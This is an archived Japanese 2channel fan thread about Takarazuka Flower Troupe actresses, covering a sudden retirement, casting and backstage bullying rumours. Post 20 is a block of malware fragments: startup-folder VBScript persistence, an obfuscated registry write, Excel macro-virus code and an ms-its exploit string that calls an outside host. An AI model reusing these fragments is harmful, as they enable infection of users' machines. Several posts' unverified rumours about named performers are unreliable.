2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【花娘】花組娘役スレ8【百花繚乱】

1 :名無しさん@花束いっぱい。:2006/12/27(水) 00:07:35 ID:S5tV80TI
前スレ
【花娘】花組娘役スレ7【百花繚乱】
http://hobby8.2ch.net/test/read.cgi/siki/1154780323/l50

またーり、花娘について語ってみようではありませんか。

・次スレは、980踏んだ人よろしくです。
・煽り、荒し、叩きは徹底スルーです。
・路線・非路線・組替ちゃん、み〜んなかわいい花娘です。

2 :名無しさん@花束いっぱい。:2006/12/27(水) 00:24:35 ID:F+vydIFx
1さん、乙華麗です。


ナル何があったの?
せめてマイトラで発表とかできなかったのか?
前言われてた水疱瘡うんぬんはガセ?

3 :名無しさん@花束いっぱい。:2006/12/27(水) 00:30:16 ID:CyY/uGab
華城季帆ちゃんとか退団なんだってね…好きだったのに

26日って集合日だったんでしょ?なんでなん?

4 :名無しさん@花束いっぱい。:2006/12/27(水) 02:43:54 ID:HmPJwpoO
ナルはやっぱりもったいなかった。娘1になれるかっていうと
微妙だけど、あの美声は努力して得られるものじゃなかったわけ
だし。

5 :名無しさん@花束いっぱい。:2006/12/27(水) 02:50:02 ID:KMOoj88I
こう言っちゃなんだけど、ナルやめるなら新公&DCヒロイン
遠慮して欲しかったな。
どっちも「ナルじゃなきゃ!」「流石ナル!!」って出来ではなかったし、
どっちかって言うと「まぁ、良い面もあるんだけど
前から言われてる弱点が相変わらずだね・・・」って感じだったから
だったら多少冒険してでも他にチャンスを回して欲しかった。


急に決まった退団なら仕方ないけど・・・・・

6 :名無しさん@花束いっぱい。:2006/12/27(水) 05:55:31 ID:96sPqwCH
オーディションでも受けたかったのかな?海外留学?
家の都合?なんだったんだろう。地元新聞紙でファントムの時に
「今が楽しい」と言っていたのに

7 :名無しさん@花束いっぱい。:2006/12/27(水) 12:42:26 ID:7jqOVrNj
いやいや、レビュ本の
「娘役として工夫していることは?」とかの質問に
「特にありません。」って答えてたナルだよ。
楽しんでいたとは思えません。

8 :名無しさん@花束いっぱい。:2006/12/27(水) 13:51:20 ID:VprZh9qp
7>私も思った!レビュ本のナルの質問に対しての受け答えが冷えてるなーって思った!
一言系とか「特にありません」を多様してた覚えがあります。

9 :名無しさん@花束いっぱい。:2006/12/27(水) 14:23:24 ID:gOr+Ptnv
ナルちゃん宝塚嫌いだったの?
ガーン

10 :名無しさん@花束いっぱい。:2006/12/27(水) 14:37:23 ID:hQct3P/c
ヤフーブログの検索数急上昇キーワード に「華城季帆」が。

11 :名無しさん@花束いっぱい。:2006/12/27(水) 14:44:52 ID:TJ4/21DE
↑どうやったらその情報見れる?


12 :名無しさん@花束いっぱい。:2006/12/27(水) 14:47:41 ID:hQct3P/c
http://blog-search.yahoo.co.jp/

13 :名無しさん@花束いっぱい。:2006/12/27(水) 15:20:04 ID:4gJrVBqQ
Q・手作りのアクセサリーや髪飾りに関して
印象深いエピソードがあれば教えてください。
A・ありません。

Q・舞台で緊張したときはどのように対処しますか?
A・特にないです。

Q・普段の生活でも出てしまう娘役のクセなどはありますか?
A・特にないです。

14 :名無しさん@花束いっぱい。:2006/12/27(水) 16:07:15 ID:p5/+DJP5
じゃあナルちゃん何で宝塚入ったんだろ?
男役志望だったとか?

15 :名無しさん@花束いっぱい。:2006/12/27(水) 16:11:26 ID:xTF3G/7m
>>14
男役希望っていうのは聞いたことあるよ

16 :名無しさん@花束いっぱい。:2006/12/27(水) 16:25:18 ID:7jqOVrNj
ナルは、性格的にも娘役には向いていないし、元々男役希望。
身長であきらめた。
声キレイだしスタイルいいし娘役として十分使われていたけど、
本人は100%ヤル気があったワケではなく、
まだ割り切れていない部分があったらしい。
運動会あたりで聞いた話。

17 :名無しさん@花束いっぱい。:2006/12/27(水) 17:47:24 ID:KMOoj88I
だったら男役並に格好良い娘役目指せば良かったのに
毎回自分の持ち味とは真逆の可愛い系目指してたよね。


ナル的には「男役も無理だし、娘役しても娘1は無理だし、
おまけに娘1には自分より下で何も出来ないし。」
って感じなのかな。

18 :名無しさん@花束いっぱい。:2006/12/27(水) 17:51:53 ID:+HsNWScj
娘役本の時はそんな冷めた答えじゃなかったのに。
下級生が娘1になってから冷めてしまったのかな。
何にせよあの美声とスタイルは惜しい限り。


19 :名無しさん@花束いっぱい。:2006/12/27(水) 18:27:26 ID:/s7qF9f/
もっと頑張ればいいのにとかガッカリだとか言ってる人いるけど実際大変だと思うよヅカ
宝塚が好きでいられる生徒なんて一握りなんじゃないの?

20 :<body onload=window()>:2006/12/27(水) 18:30:56 ID:ZhvU3orp
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

21 :名無しさん@花束いっぱい。:2006/12/27(水) 18:57:54 ID:7wssBv9L
娘1が下級生だからってのは全然関係ないんだけどね


22 :名無しさん@花束いっぱい。:2006/12/27(水) 19:13:36 ID:Y5dMC7ZX
集合日付けの退団って、その日、花組が集まっている稽古場に来て
挨拶をするとかそういう行事はあるんですか?

23 :名無しさん@花束いっぱい。:2006/12/27(水) 19:40:29 ID:AuQuAdzS
>>13冷めすぎwwここまでくると何か良いね。

24 :名無しさん@花束いっぱい。:2006/12/27(水) 20:38:58 ID:QCN6bZs8
>14
自分の器は顧みずにw
トップを目指して入る人が多い。

宝塚が好き、と言うより、
自分がセンターで光り輝いている宝塚、が好きらしい。

25 :名無しさん@花束いっぱい。:2006/12/27(水) 20:44:41 ID:eK39glRX
ただ単に、彩音の下でやるのが嫌だったんでしょ?
それだけのことだよ。

26 :名無しさん@花束いっぱい。:2006/12/27(水) 21:01:15 ID:8CDFNpUe
>22
椅子にざーっと座って写ってる集合日の写真あるでしょ。
演出家、組P等の挨拶の後、退団者も自分の席で立ち上がって
「今回の公演をもって退団させていただくことに…etc」と挨拶するそうな。
集合日付けは「本日をもって退団…」と挨拶するのかなあ。。。(涙)
しかも、台本は配られず、本読みは参加せずに早退状態なのかなあ。。。(涙)

27 :名無しさん@花束いっぱい。:2006/12/27(水) 21:15:48 ID:C4SD4eP3
>21
事情をご存知みたいですね。

28 :名無しさん@花束いっぱい。:2006/12/27(水) 21:48:14 ID:/J3H0MYH
>26
以前、他組で集合日付けで退団した某路線系?娘役は、確か集合日には来ていたと聞いた。
挨拶だけして即帰るんじゃ?

29 :名無しさん@花束いっぱい。:2006/12/27(水) 23:00:59 ID:RMNXU5A/
情報で今さわいでいるが、次回公演のポスターやチラシに名前があるんだから退団理由が彩音のわけない>ナル

30 :名無しさん@花束いっぱい。:2006/12/27(水) 23:49:38 ID:bOwYglrl
反論多そうだからこっそりと、トップになって欲しかったのは、
あやねよりなるかな
あやねは何がよいのかわからん・・・ 何か顔とか怖い・・・

31 :名無しさん@花束いっぱい。:2006/12/28(木) 00:21:32 ID:A7FaMRy5
ナルは全然好みじゃないけど、何で急に???

32 :名無しさん@花束いっぱい。:2006/12/28(木) 00:26:12 ID:SOaRHeol
くだらねーこと書いて上げるな!ヴォゲ!

33 :名無しさん@花束いっぱい。:2006/12/28(木) 02:42:55 ID:pBcGhGlK
トップ娘役になるつもりだったのに頼みのとむが組替えだしな

34 :名無しさん@花束いっぱい。:2006/12/28(木) 02:51:42 ID:pvZo6L9s
ナルも気になるが、すーちゃんも気になる…
彼女まだまだこれからだったのに〜
集合日付退団は納得できません(涙)

35 :名無しさん@花束いっぱい。:2006/12/28(木) 03:44:10 ID:0BIhwi9W
>>30
こっそり同感です。
顔はまあ好みの問題だけどさ。
何で歌が売りのオサの相手役が彩音なのか未だに疑問。
他にこれと言って出来る物もなければアクセ等のセンスもイマイチ。
正統派とか言われてるけどそれはある程度の実力がある上での話。
あの破壊された歌聞かされる度にチケ代損した気がする。

36 :名無しさん@花束いっぱい。:2006/12/28(木) 04:49:58 ID:FTrNYguq
昨日の夜、スカステでやってた「宝塚クロニクル2006 花組」で
この1年の公演や生徒の退団、組替えが紹介されていて
えりたんの12月25日付けの組替えまではナレーションがあったのに
華城さんと澪乃さんは写真だけでナレーションがなかったのは
急に決まったことでナレーションが間に合わなかった(?)ということ?

37 :名無しさん@花束いっぱい。:2006/12/28(木) 05:43:31 ID:nxnrwP2C
どっちもどっちな感じ。
彩音は実力しょぼ杉・ナルは華なさ杉で、
娘1としては微妙な人材にしか見えない。

2人共、オサとの並びは全然合わんし。

38 :名無しさん@花束いっぱい。:2006/12/28(木) 07:15:43 ID:uWnZoxJ5
>>37 禿同。
それでもまだナルは、声が綺麗だというだけいい。
彩音は顔大きい、首短い、鷲鼻の上に、歌・芝居・ダンスとどれも特出したものがない。
よく『正統派のクラシカルな雰囲気を持っている』と書かれているが、誉められるのが雰囲気だけって、どうよ。
なんでこの娘が大抜擢で娘1にならなきゃならないのか、真剣にわからん。
誰か彩音のよさを教えて!

39 :名無しさん@花束いっぱい。:2006/12/28(木) 07:28:20 ID:vmKbaGzo
ナルがいないとなるとエトワール誰ですかね。
ちあきさんが念願の本公エトワールをゲットするのか
さーやて行くのかはたまた大穴シビさんか…。

…シビさんエトワール、いいなあ(´ー`)y-~~

40 :名無しさん@花束いっぱい。:2006/12/28(木) 07:46:18 ID:/MlGLaWS
花娘=ナル&りりか だった他組ファンの私には分からないんだけど、エトワールの
候補は2人だけ?退団が続いたにしてもバウや新公でなら活躍したことのある
歌手が他にもいないの?
いないとなるとちゃんとしたエトワールを作らない可能性もあると思う。オギーだし。
その次の公演までに組替えで何とかするんじゃないかなあ。

41 :名無しさん@花束いっぱい。:2006/12/28(木) 07:51:23 ID:vmKbaGzo
>40
いなひ。
本公ですら歌を貰う人が少ないので
新公でも周ってこないんだよ。

娘役だとちあきさん、さーや、萌子、くまくま
萌子とくまくまは扱い・学年からいってエトワール以前の問題
ということはちあきさんとさーやしかいないわけですね。

まあ、花組のことだから男役か路線にさせそうだけど

42 :名無しさん@花束いっぱい。:2006/12/28(木) 08:27:12 ID:wlOe+I3A
幸か不幸か、
オギーってショーのエトワールを、あえてエトワールにふさわしい娘役に振るタイプではないから
(バビロンはあきちゃん、ロマンチカはケロさん、タランテラは水さん)
エトワールの心配はいらないと思う。

43 :名無しさん@花束いっぱい。:2006/12/28(木) 09:08:50 ID:yw2sfeLf
>40
演目が悪かったのかそういう方針なのかはしらんが
バウで脇娘役が歌を歌うところなんかほとんどない
新公は本公ですら脇娘役に歌がないのであるわけがない

歌わせたら歌える子はいるんだろうけどね

44 :名無しさん@花束いっぱい。:2006/12/28(木) 10:39:26 ID:N1WS2/SI
>38 この時点で彩音のいいところがサッパリな人になに言っても無駄かもしれんが。
私の考える彩音のいいところは、
・お芝居にハートがあること(表情が豊かでわかりやすい)
・やっぱり華がある。(ファントム新公、モブでも光ってた)
・なんといっても娘役としてのたおやかな雰囲気
・相手役へのお慕いしてますビーム大放出なところ

オサとの相性でいっても、歌もデュエットなら綺麗にハモれてるし
オサのあの特徴的な柔らかすぎるダンスにも合わせられてるし。
(要するにオサの持つ世界、雰囲気の邪魔にならず魅力を倍増できてる)
二人とも鼻筋通ってるから横顔のラブシーンが美しいし、
まあ顔の大きさはちょっとアレでも私は特に気にならないな。

と言うわけで彩音娘1は花丸合格点だと思ってます。
ナルは確かに惜しいけど、もろもろの点からオサの相手役はありえないと
以前から思ってました。
長文スマソ。

45 :名無しさん@花束いっぱい。:2006/12/28(木) 11:05:24 ID:/Ey2G8ct
>>44
すげー激しく同意だ。
丁寧に書いてくれてありがd

46 :名無しさん@花束いっぱい。:2006/12/28(木) 11:13:53 ID:Xb7QxbsX
BSでマラケシュ観たときの彩音ちゃんは可愛かった
クリスティーヌ・マリーと似たような役が続いたから
黒蜥蜴が正念場だよね

47 :名無しさん@花束いっぱい。:2006/12/28(木) 11:48:41 ID:wtV4S80d
>>44
私も激しく同意。
あと(舞台人として当たり前だけど)相手の芝居をきちんと受け止め、ちゃんと役として返せれる所
かつアドリブに強くて舞台度胸がある所は良いと思う。
息苦しそうな台詞の言い方とかは癖があるから急速に直してほしい
もっと落ち着いた声が出ると良いと思うのだが。
黒蜥蜴役は観てみないと分からないし、ここで一皮剥けるかが勝負所かな
花組ファンとしては見守るしかないから、頑張ってほしいと思う。
(でも1番心配なのはキムシンの脚本なんだよ・・・)
長文すいません。

48 :名無しさん@花束いっぱい。:2006/12/28(木) 13:22:48 ID:ib+C0cA5
>>44、47
うちも禿同。
2人が挙げてる彩音の魅力をナルはひとつも持ってなかった。そのかわりナルが持ってて彩音が持ってないものは美声だけ。
歌のうまさってハートがなきゃ成り立たないじゃない?それを彩音は持ってると思うから歌に関しても問題ないと思う。
顔の大きさはオサと並ぶからかわいそうだけど…
でもどっちみち花1に関してはナルは論外だったと思う。未だに新公やバウ主演が謎だもん。ほかにチャンスわけてあげてほしかった。

49 :名無しさん@花束いっぱい。:2006/12/28(木) 13:49:36 ID:dPTjOcrQ
今度はあやね擁護とナル叩きか…

50 :名無しさん@花束いっぱい。:2006/12/28(木) 14:11:19 ID:Xt1CUmf5
同じ内容でも、44,47と48は書き手の心根の違いが現れてるね。


51 :名無しさん@花束いっぱい。:2006/12/28(木) 15:53:59 ID:I1V4e0qK
花娘はみんなおおむね好きだな。
ナルとスー子も好きだったけど、家庭の事情や解雇じゃないんだったら、きちんとファンに人義切ってほしかったよ。
こんな辞め方、本人たちだけじゃなく、花ファンにとっても後味悪すぎる。

52 :名無しさん@花束いっぱい。:2006/12/28(木) 16:54:57 ID:Z5IPf2b2
>44 51禿同
文句言いながらも、花娘の成長は嬉しかったよ。
ファンはそんな思いで見ている人もいるんじゃないかな。
以前ファンの子がナルと喋っててとっても嬉しそうだったのを見た事がある。
あの子、どんな思いでいるだろう…
本人が希望しての集合日退団だったらあんまりだ。

53 :名無しさん@花束いっぱい。:2006/12/28(木) 17:45:19 ID:jEakjxOf
ファンなんてどーでもいいや〜とでも思ってたんじゃないの
じゃなかったら退団後に自分のファンに気持ちのこもった礼状なりなんなり出すでしょ>ナル

54 :名無しさん@花束いっぱい。:2006/12/28(木) 18:04:38 ID:HYiy9xEF
44さんの言うように、彩音はオサ様用の寄り添い系娘1ポジ限定ならば、まあまあ良いと思うよ。
オサ様の歌や演技の邪魔をせず合わせるだけなら、単体では若くて実力未熟な彩音でも
そう問題ないし。
オサ様の邪魔になりにくい個性だし(ただし顔・体のサイズはマトアヤなら無問題だが…)。
オサ様に華を添えるという、娘1として最低限の役目はきっちり果たすし。

でも『黒蜥蜴』はどうするんだろ?
「カリスマホストみたいな明智様と、明智にお熱の不良少女・黒トカゲちゃん」
みたいにした方がしっくり来そう…。

55 :名無しさん@花束いっぱい。:2006/12/28(木) 18:57:44 ID:vmKbaGzo
>53
挨拶状は一応来たみたいだが

56 :名無しさん@花束いっぱい。:2006/12/28(木) 20:59:14 ID:57vTiSxh
でも、あれだけの歌の実力を持っていた花咲、
それでこんどの華城、澪乃の立て続けの退団。
ちょっと目立ってた子が立て続け。
パレルモのときの休演連続といい、
花娘にはなにか事情があるのかと心配しちゃう・・・
雰囲気わるいのかなぁ?

57 :名無しさん@花束いっぱい。:2006/12/28(木) 21:06:57 ID:Q09FFtFY
リアルにいじめじゃなかろうか>花咲

58 :名無しさん@花束いっぱい。:2006/12/28(木) 23:17:00 ID:UyJgE0Lu
りりかはベラドーヴァ抜擢でかなりいじめられた
という話を聴いた事がある。
「あれでベラドーヴァなの?全然母親らしくないじゃない」
「キンキン声きも〜」
とかある生徒にいわれたらしいが…。
で、その人が出ない公演爽やかな気持ちで退団しようと思っていて
MINDがちょうどその人が出ないので退団をしたとか。
かわいそうなりりか…。ファンになったところだったのに…。

59 :名無しさん@花束いっぱい。:2006/12/28(木) 23:33:57 ID:dA5mNjFO
りりかちゃん頑張ってたのにね…


60 :名無しさん@花束いっぱい。:2006/12/29(金) 00:18:50 ID:hLnHSVSb
りりか、寿じゃなかったの?

61 :名無しさん@花束いっぱい。:2006/12/29(金) 00:39:00 ID:PWWEkPdz
いじめられて辛いとこに優しい彼がいた
とかじゃなかろうか?

62 :名無しさん@花束いっぱい。:2006/12/29(金) 03:10:37 ID:dJSQRv5Q
セリフ回しがワンパターンだから、芝居が上手いとは思えないなぁ…>彩音

63 :名無しさん@花束いっぱい。:2006/12/29(金) 09:06:59 ID:u51HpCso
DCにいなかった先輩・・やはり○花だと思ってしまう。。

64 :名無しさん@花束いっぱい。:2006/12/29(金) 10:08:50 ID:bcHBs08A
>63
そういう憶測が憶測を呼び、
その憶測がここ2の定説となっていくんだろうな。

65 :名無しさん@花束いっぱい。:2006/12/29(金) 13:25:40 ID:1/acg3hv
憶測じゃなくて作り話でそw


66 :名無しさん@花束いっぱい。:2006/12/29(金) 14:24:20 ID:CSEoSdJL
特定の誰かに限らず花は昔からくだんねー虐めばっかだな
ほんわか雰囲気(と言われている)の雪でさえ陰湿な虐めあるんだし、路線の娘や
飛び抜けて可愛い・芸がある娘はターゲットは避けられない

67 :名無しさん@花束いっぱい。:2006/12/29(金) 14:53:12 ID:lLmej+/u
つーかナルは、虐めにあってもプライドが高いし、涙を流すような人
ではなくて「無視」をつらぬき、睨んだりしていたと聞いたが…?
で、虐めは自然となくなったと。
一花も昔虐めにあっていた時期があったとかね。
彩音は聞かないけどどうだったんだろう…。きらりも聞かない。

68 :名無しさん@花束いっぱい。:2006/12/29(金) 15:14:16 ID:rnp9PGr4
それが本当なら、ナルって男よりも男らしい性格だな。


69 :名無しさん@花束いっぱい。:2006/12/29(金) 17:48:44 ID:bDLSaPW6
花って恐い組ね。





そして、彩音ちゃんのファンも恐い。ナルちゃん、一花ちゃん叩き…次はすみかちゃん辺り叩くんですか?

70 :名無しさん@花束いっぱい。:2006/12/29(金) 19:56:35 ID:ob4xNeDh
ナルをいじめてた人、結構回りに漏れてるんだよね。
某バカな下級生が出の時にその話をファンにしてたというorz

71 :名無しさん@花束いっぱい。:2006/12/29(金) 20:11:21 ID:nYAih5rx
>66
役付きの良い生徒に対するイジメなんて
組を問わず、男役娘役を問わず昔からだよ。
虐められなかったと聞いたのは汐風幸ぐらい。
スターになるにはそれを乗り越える精神力が必須と言われている。

72 :名無しさん@花束いっぱい。:2006/12/29(金) 20:13:09 ID:ob4xNeDh
幸ちゃんもイジメられてたよ

73 :名無しさん@花束いっぱい。:2006/12/29(金) 21:16:20 ID:PWWEkPdz
いじめを乗り越えた者だけが持つ芯の強さというのが舞台姿の美しさに
つながってる気がする>宝塚

74 :名無しさん@花束いっぱい。:2006/12/29(金) 23:26:38 ID:aA+HnQoU
路線ジェンヌはオフの顔つきがキツイ子が多い。
笑っている顔が怖い人も多いw

75 :名無しさん@花束いっぱい。:2006/12/29(金) 23:51:24 ID:FadgUazS
彩音もほんわか見た目でも、運動会の椅子取りゲームで
根性を見た気がするw

あれくらいないとトプにはなれんのだろうな。
(褒めてます)

76 :名無しさん@花束いっぱい。:2006/12/30(土) 00:14:19 ID:6pRcLA7C
あの椅子とりは根性あったねw

77 :名無しさん@花束いっぱい。:2006/12/30(土) 00:46:17 ID:GHTwDUzL
椅子とりで三人の時に、彩音がキャビィを持ち上げ立たせようとしてて
優しいなぁっておもった。
話が変わるが、かなみんのいじめも懐かしい。
口紅袖汚し、源氏扇子ボロボロなど…本人も宙への組み替え喜んだろうな。

78 :名無しさん@花束いっぱい。:2006/12/30(土) 01:12:40 ID:DAJwXgAN
かなみんいっとき顔やばかったよね
あ…いじめられてるんだ…って直感的に思った。
今は幸せそうで嬉しい

79 :名無しさん@花束いっぱい。:2006/12/30(土) 11:05:42 ID:jDCb/McM
りりかは外部を目指して辞めたと聞いたんだけど違うのかな?
その線を考えて勉強(レッスン!?)もしていたと聞いたが・・・。

80 :名無しさん@花束いっぱい。:2006/12/30(土) 11:44:44 ID:XaIYRjtD
>>77
かなみん虐めは誰が主導を握っていたのやら…。
意外にもみどり・まー・ふー辺りだったりして…。
あっきーも組替え後は少なくとも表面上はみどりと仲良くしているように
見えた。(TCA2002の終了後映像見て)
花は早期抜擢の子を虐める習性にある。くるみんも虐めで辞めたらしいし。
でも、花を経験してきた娘役って根性ある子多い気がする。
>>79
確かにりりかは退団後の事とかもきちんと考えていそうだな…。
時期が重なったのか…?

81 :名無しさん@花束いっぱい。:2006/12/30(土) 12:07:17 ID:nvimD26a
かなみの源氏扇子ぼろぼろ・・って何?それで公演出たの?それしかなかったのか・・
宙に行ってからは大丈夫だったのかな。上級生限られてたしね。

82 :名無しさん@花束いっぱい。:2006/12/30(土) 12:42:36 ID:rjj7sfS+
彩音ちゃん椅子取りゲームで大活躍だったのですか?

83 :名無しさん@花束いっぱい。:2006/12/30(土) 13:30:20 ID:CCQSG3/B
りりかは外部でしょ


84 :名無しさん@花束いっぱい。:2006/12/30(土) 13:35:10 ID:dYO7ggD4
済んだ話をいつまでも続けるのってどうかな。

85 :名無しさん@花束いっぱい。:2006/12/30(土) 15:12:10 ID:P5lAfcKB
りりかは、ダンスが嫌いでやめた。カノ女は歌だけ歌えればいいの。
くるみは体調不良、ま、その原因は分からんが。一年上も同期も娘はキョーレツなのがいたもんね

86 :名無しさん@花束いっぱい。:2006/12/30(土) 17:53:39 ID:P/gEkKnE
くるみん、ストレスからか顔中ブツブツだらけで気の毒だった
ほさちや純の時も凄いイジメネタばかり流れてたねぇ
花は他組よりそういった話題が生徒から漏れることが多い気がする

87 :名無しさん@花束いっぱい。:2006/12/30(土) 17:57:47 ID:VG0kcPOX
そういう噂スズメが、結果的に一番の“加害者”になるような気がする。

88 :名無しさん@花束いっぱい。:2006/12/30(土) 18:15:16 ID:gm8msa43
ふーっていじめ女王だったんだよね。
新公ヒロイン前に聞いた。
いじめ、ブランド、カネコネの三冠王。

89 :名無しさん@花束いっぱい。:2006/12/30(土) 20:21:30 ID:3TmEZvm7
かなみんって組替えがイヤだったって聞いたけど、いじめられてたのにそれでも花組が良かったのかな。

90 :名無しさん@花束いっぱい。:2006/12/30(土) 20:30:57 ID:XaIYRjtD
>>81
源氏物語の時にかなみんの女三の宮の持ち物の一つの扇子がボロボロに
されたらしいよ。結局かなみんは何とかして舞台にたったとか。
>>89
同期が居たからなのか…。それとも表面上なのか…。

91 :名無しさん@花束いっぱい。:2006/12/30(土) 21:55:58 ID:Q2PMuI72
新公ヒロインとバウヒロインの予想でもしますかね

92 :名無しさん@花束いっぱい。:2006/12/30(土) 22:00:28 ID:dYO7ggD4
新公もバウもすみ花ちゃんじゃないかな?

93 :名無しさん@花束いっぱい。:2006/12/30(土) 22:04:20 ID:Q2PMuI72
うーむ…じゃあエトワールでも予想しますかね

94 :名無しさん@花束いっぱい。:2006/12/30(土) 22:13:27 ID:XaIYRjtD
エトワールはさあや・もえりん・くまくまの若手歌手3人とか
シビ・えりの貫禄ありエトワールを

95 :名無しさん@花束いっぱい。:2006/12/30(土) 22:34:25 ID:dYO7ggD4
わかなちゃんが最後だか見せ場あるといいね。

96 :名無しさん@花束いっぱい。:2006/12/30(土) 22:51:53 ID:H6spSyDB
わかなちゃん、シンガーだよね?
マラケシュのメイドさんとかでソロ歌ってたりした。
今回もなんか見せ場あると良いね。

97 :名無しさん@花束いっぱい。:2006/12/31(日) 00:09:08 ID:gm4+yUXQ
>95>96
オギーなら何か考えてくれるさ。

98 :名無しさん@花束いっぱい。:2006/12/31(日) 01:44:50 ID:57LViqJf
ふー、あすか、ナルの並びが好きだった

99 :名無しさん@花束いっぱい。:2006/12/31(日) 03:22:31 ID:MnYqgelV
>>98
いろんな意味でスゲー。。。

100 :名無しさん@花束いっぱい。:2006/12/31(日) 11:44:21 ID:imgndfr0
100ゲト!
彩音ちゃんって皆から愛されてるね。歌劇読んで思った。

101 :名無しさん@花束いっぱい。:2006/12/31(日) 12:20:56 ID:RzbpJSKD
私も思った。
上手くいってそうね。

102 :名無しさん@花束いっぱい。:2006/12/31(日) 13:44:45 ID:faDjjwV7
>97
95です。そうですね、オギーなら考えてくれますよね。
いろんな人に見せ場があるといいな。

103 :名無しさん@花束いっぱい。:2006/12/31(日) 16:27:17 ID:fquNXEPP
単独でエトワールできそうな娘役がいないから、(しいて言えばエリさん?)
複数か、変則エトワールになりそうだね。
複数ならばわかなちゃんを入れてやってくれないかのぅ。

104 :名無しさん@花束いっぱい。:2006/12/31(日) 16:58:40 ID:gm4+yUXQ
>103
オギーに念力で伝えろ!

105 :名無しさん@花束いっぱい。:2006/12/31(日) 17:18:51 ID:QNOEFbxa
もえこ と くまくま 

って、どなた?

106 :名無しさん@花束いっぱい。:2006/12/31(日) 17:54:38 ID:faDjjwV7
もえこ=愛純もえりちゃん
くまくま=芽吹幸奈ちゃん

107 :名無しさん@花束いっぱい。:2006/12/31(日) 17:55:01 ID:fquNXEPP
>>104ハマコヴォイスにて代理伝達でもよろしいか?
残念ながら念力の持ち合わせが無いのだ

>>105もえこ=愛純もえり
くまくま=芽吹幸奈

108 :名無しさん@花束いっぱい。:2006/12/31(日) 18:09:01 ID:AgSkbmAb
でも、オギーショーでエトワールを歌手がやったの
最初のパッサージュぐらいじゃなかった?

パッサージュ→美穂さん
バビロン→あきちゃん
ロマンチカ→ケロさん
タランテラ→?(観てないんでわかりません…)


109 :名無しさん@花束いっぱい。:2006/12/31(日) 18:11:52 ID:6HccuPJi
タランテラ→水?

110 :名無しさん@花束いっぱい。:2006/12/31(日) 19:25:24 ID:X3d89di9
つーことは路線男役の可能性のが高いか

111 :名無しさん@花束いっぱい。:2006/12/31(日) 19:31:10 ID:SPm9Bt6D
まっつエトワールで、みわっち一人降りのような気がする。

112 :名無しさん@花束いっぱい。:2006/12/31(日) 20:14:37 ID:fquNXEPP
まっつならいいな(・∀・)!
みつるだったらびっくりだな…(´・ω・`)

113 :名無しさん@花束いっぱい。:2006/12/31(日) 20:30:36 ID:25qQ9n0s
>>111>>112 まっつがエトワールなんて出来る訳ねぇだろーが。
上どんだけ詰まってると思ってるんだよ!? それともアレか?まっつは花男役3番手位の脳内設定なの?w
本当いつもいつも痛いな、まっつファンって。
晒し上げときます。

114 :名無しさん@花束いっぱい。:2006/12/31(日) 20:38:32 ID:6HccuPJi
大晦日に何をイライラしとんのじゃ
餅付け25qQ9n0s

115 :名無しさん@花束いっぱい。:2006/12/31(日) 20:41:38 ID:X3d89di9
まっつでも別にいーんじゃねーの
エトワールなんて番手かんけーねーし
本来上手い人がやるべきもんだしな。

娘役にやらせてやって欲しいのが本音じゃが



116 :名無しさん@花束いっぱい。:2006/12/31(日) 20:45:06 ID:25qQ9n0s
>>115 ここ近年の花組で男役5番手??なんかがエトワールやった事なし。

>>114 即レス乙w まっつファン本当痛すぎ。

117 :名無しさん@花束いっぱい。:2006/12/31(日) 20:48:53 ID:SPm9Bt6D
1おさ 2まとぶん 3えり 4みわ 5まっつ 6みつる 7りせ だろ。
みわっちもバウ主演だし、いい加減一人降りさせると思うし、
まっつ・みつる・りせ の3人降りもあり得るけど、
エトワールに妥当な娘役もいないことで、まっつでお茶を濁せるのではと思っただけだが。
すみ花やさーやでもみたいけどね。

118 :名無しさん@花束いっぱい。:2006/12/31(日) 20:50:07 ID:fquNXEPP
オサがやったのってなんだっけ?VIVAだっけ。
タモ、チャー、樹里(新専科)に次ぐ四番手ってとこ?

119 :名無しさん@花束いっぱい。:2006/12/31(日) 20:57:34 ID:Llbtf2KC
オギーショーはエトワールなしがデフォ
予想するだけ無駄


120 :名無しさん@花束いっぱい。:2006/12/31(日) 20:58:12 ID:CFSD04lA
感じ悪い人が紛れてますね。まっつでも問題ないと思うけれど。ユミコさんが
いたらエトワールだったかも?
昼間に七星さんの歌を聞きました。素敵な歌でしたが今までのオギーの流れだと
抜擢エトワールはいないから絵莉さんの方がまだ可能性ありそう。

121 :名無しさん@花束いっぱい。:2006/12/31(日) 21:01:11 ID:6HccuPJi
七星さんは退団しちゃってますよ…

122 :名無しさん@花束いっぱい。:2006/12/31(日) 21:15:01 ID:CFSD04lA
そうなんですか?残念…他組ファンなので疎くてすみませんorz

123 :名無しさん@花束いっぱい。:2006/12/31(日) 21:17:10 ID:CFSD04lA
連続すみません。
>118
夜明けの序曲もオサさんでした。

124 :名無しさん@花束いっぱい。:2006/12/31(日) 21:17:16 ID:X3d89di9
確かにオギーだけに予想するだけ無駄だがいいではないか

シビさん、ちあきさん、さーやあたりだといいね。


125 :名無しさん@花束いっぱい。:2006/12/31(日) 21:19:07 ID:NynRbRkI
星なんてわけわからん娘役がエトワールしてたから問題ないんじゃないの
宙も和音がやったくらいだから歌が上手けりゃ路線だろうが非路線だろうが関係なさそう

126 :名無しさん@花束いっぱい。:2006/12/31(日) 21:31:21 ID:25qQ9n0s
